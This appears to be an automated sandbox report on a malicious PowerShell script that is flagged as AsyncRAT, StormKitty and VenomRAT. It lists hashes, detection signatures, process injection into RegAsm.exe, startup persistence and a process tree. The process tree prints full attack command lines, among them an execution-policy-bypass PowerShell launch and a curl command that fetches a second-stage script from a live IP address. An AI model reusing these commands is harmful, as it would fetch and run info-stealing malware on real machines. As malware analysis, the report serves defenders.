Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-01-2025 03:04
Static task
static1
Behavioral task
behavioral1
Sample
b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff.ps1
Resource
win7-20240903-en
General
-
Target
b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff.ps1
-
Size
21KB
-
MD5
524fca1eea0f55f1ad6281325664dcb4
-
SHA1
fa39a3bb823909c0294804a32303378ac25e0492
-
SHA256
b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff
-
SHA512
a8002af2535c7fa629b7375943ade44f36fe0b76ccc324ab35d09e96931f7e5fc82c88787a423ae96ad58d2683f870693edb6f5cbafdd4b6576f3d1a09ff24b2
-
SSDEEP
384:zIAXUpjxl+K++gtu0P1GUK++qUpjxl6Upjxl+mATyK++IcmATpPsPWmATEP9rPva:zIAMVl+7+gbh7+3VlnVliTy7+IITJqKh
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/1288-50-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
resource yara_rule behavioral2/memory/1288-50-0x0000000000400000-0x0000000000704000-memory.dmp VenomRAT -
Venomrat family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1548 powershell.exe 10 4480 powershell.exe -
pid Process 1548 powershell.exe 4480 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.url powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4480 set thread context of 1288 4480 powershell.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1548 powershell.exe 1548 powershell.exe 1548 powershell.exe 1548 powershell.exe 4480 powershell.exe 4480 powershell.exe 4480 powershell.exe 4480 powershell.exe 1288 RegAsm.exe 1288 RegAsm.exe 1288 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1548 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 1288 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1288 RegAsm.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1548 wrote to memory of 4804 1548 powershell.exe 84 PID 1548 wrote to memory of 4804 1548 powershell.exe 84 PID 4804 wrote to memory of 5052 4804 cmd.exe 85 PID 4804 wrote to memory of 5052 4804 cmd.exe 85 PID 4804 wrote to memory of 4480 4804 cmd.exe 86 PID 4804 wrote to memory of 4480 4804 cmd.exe 86 PID 5052 wrote to memory of 4208 5052 cmd.exe 87 PID 5052 wrote to memory of 4208 5052 cmd.exe 87 PID 4480 wrote to memory of 4084 4480 powershell.exe 88 PID 4480 wrote to memory of 4084 4480 powershell.exe 88 PID 4084 wrote to memory of 2404 4084 csc.exe 89 PID 4084 wrote to memory of 2404 4084 csc.exe 89 PID 4480 wrote to memory of 932 4480 powershell.exe 90 PID 4480 wrote to memory of 932 4480 powershell.exe 90 PID 4480 wrote to memory of 932 4480 powershell.exe 90 PID 4480 wrote to memory of 1288 4480 powershell.exe 91 PID 4480 wrote to memory of 1288 4480 powershell.exe 91 PID 4480 wrote to memory of 1288 4480 powershell.exe 91 PID 4480 wrote to memory of 1288 4480 powershell.exe 91 PID 4480 wrote to memory of 1288 4480 powershell.exe 91 PID 4480 wrote to memory of 1288 4480 powershell.exe 91 PID 4480 wrote to memory of 1288 4480 powershell.exe 91 PID 4480 wrote to memory of 1288 4480 powershell.exe 91
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\system32\cmd.execmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\system32\curl.execurl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps14⤵PID:4208
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qea3fboq\qea3fboq.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FDA.tmp" "c:\Users\Admin\AppData\Local\Temp\qea3fboq\CSC23356B284B5B432A81DAA822C75F1D12.TMP"5⤵PID:2404
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:932
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1288
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5693fbf640eee020f43c6546508b0f8e6
SHA1539dde73489a99bb90fc4f57faf2008821c21fcb
SHA256751f6310f960c1780b7a65dbd209386ed604852f2974ef8920ec13e86f30a5a6
SHA512d285f05950d7111ddb3ebc9b03d8560b68664edc53624290b4f4af0c6edf0e38cacd45cee833cb58322980579d3a87164b8efd47ea324b30ef86c48e067f17dc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD5402faf6194865ab27a7c4160041e3f26
SHA1675ed9d12820b92172af1aaf9ea81cdec8b30817
SHA256eae993e1d296db60da4d250c68189441d5e9d91a96264677b8e8d76e18b46e25
SHA5129ff93a9f5bdb50f5e578a5e4af66dfc074dac31f3bc84c0d26235e3fac5a0f63761d34318531f2137cdf41e23701dc2c7828d45e681cfa48bb6cd5f56a1156a7
-
Filesize
5KB
MD5380f7a432a6528223c05a2d48990827c
SHA1ea7d06b5acda2f1afacd348fe64454fadaa4ece4
SHA256cb6aaa288e92a75b77120f5996cddacf5374c5fcc3679f942554d52f740149c6
SHA512cf16e64182cab9f2ecf9ae4351be69d0bce0833973f2071df76e1061cda9128c54392ffde006c64d41f4c26d3086cdcc85ea0410ecb29887f72f40db33a0c803
-
Filesize
652B
MD581736ba77b1de98274e2e25595b8d862
SHA1de715362df5d429120ccb5d553cc613f6121ec55
SHA256a43dedcec6e280e0cfb259b01a58c511034917eb31754f33adea505c7854e2fb
SHA512bbcd176fe7dbd8e90cd06243f02e59426e9887cd59d2f519eda308469386047d2e7434117ce610f79729bceacc8532e2e7d0f531fb6fa63303e09b9f13d7ddfa
-
Filesize
10KB
MD54cffc8d6fe3870e0046b7be9bff146aa
SHA1aee44d9772c5392c5da7237ba0090cbadfd4eeac
SHA256e6518d89d7c8f761a277fe634fed0c41a4deee7c8d5cd4eaca503d88f247ec83
SHA51242fa00f7ce8fb9f77f1c7b3b140bb6708d01609bbc77514e86d34c1ed82b2d6a0a4f4775674043c3e4a486e4e19f3dcf3c0d33f73fcd79e75126b2f42fac136a
-
Filesize
204B
MD5f280434abc376b82fe93e8360acae503
SHA1af281eeb04c8df27924f0a3c4e92c7918ae51483
SHA256395c8ab99434facb6ba847c7baed2424e36a23c5459997005dc2d8baace25f75
SHA5128fd4cca460215e0d7d4dfc97f2b71404cb43ca5401a9bba89adff2500024010b6fdcfdab26fec05d727275d46c76ecdaf1833179807e54d5e559b80fcf4818f7